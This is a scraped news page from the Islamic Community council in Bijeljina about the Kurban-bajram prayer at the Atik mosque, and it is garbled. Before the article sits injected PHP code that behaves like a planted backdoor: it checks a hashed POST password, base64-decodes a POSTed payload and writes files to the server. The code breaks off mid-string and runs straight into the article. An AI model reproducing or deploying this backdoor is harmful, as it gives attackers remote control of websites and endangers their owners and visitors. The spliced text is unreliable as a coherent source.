function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Bajram-namaz u Bijeljini - Dan zbližavanja ljudskih srca - Medžlis Islamske zajednice Bijeljina

Bajram-namaz u Bijeljini – Dan zbližavanja ljudskih srca

Bajram-namaz u Bijeljini – Dan zbližavanja ljudskih srca

Bajram-namaz na području Medžlisa Islamske zajednice Bijeljina klanjan je u pet džamija na području ovog medžlisa, a centralna svečanost, uz prigodne ilahije, vaz i hutbu, upriličena je u Sultan Sulejmanovoj Atik džamiji u Bijeljini, koja je bila pretijesna da primi sve vjernike.

U haremu bijeljinske Sulejmanije
Sabah namaz imamio je i vaz držao imam Atik džamije Mirsad ef. Okanović, koji je podsjetio na vrijednost vremena za muslimane, posebno se obraćajući omladini kojoj je preporučio da u životu imaju cilj, da pronađu svrhu života. „Tehnička i tehnološka revolucija tu ne mogu pomoći, ako se ne držimo Kur`ana i puta koji nam je trasirao Muhammed, a.s. Mi smo uzrok svojoj sreći i svojoj nesreći. Molim Allaha da budemo uzrok našoj sreći, da naš ummet izađe i mraka, iz tmine,“ kazao je Mirsad ef. Okanović.
Bajram-namaz imamio je i bajramsku hutbu držao glavni bijeljinski imam Samir ef. Camić. „Ovaj impozantni skup u mubarek trenucima Kurban-bajrama šalje nam jasnu poruku da nam je mjesto upravo ovdje, u ovom džamijskom safu, da shvatimo koliko smo jedni drugima bitni i koliko jedni drugima možemo pomoći. Ovo je dan zbližavanja ljudskih srca,“ kazao je vjernicima u bijeljinskoj Sulejmaniji glavni imam Samir ef. Camić, zahvalivši se posebno džematlijama iz dijaspore koji bajram-namaze redovno klanjaju u Bijeljini.

Atik dzamija i vjernici
Vjernici su prvi dan Kurban-bajrama proveli u krugu svojih porodica i u propisanim ibadetima. Mnogi su za ovu priliku došli iz dijaspore, kako bi još jednom pokazali odanost rodnom kraju. Za sebe i svoje komšije kurbane je u svom dvorištu zaklao bijeljinski majstor Senad Ćosić, u mahali Gvozdevići. Ovo je tradicija u porodici Ćosić, a Senad kaže da se ovaj ibadet ne smije izostaviti. Pune ruke posla oko prihvatanja kurbanskih kožica i kurbanskog mesa imali su svi uposlenici MIZ Bijeljina.

Senad Cosic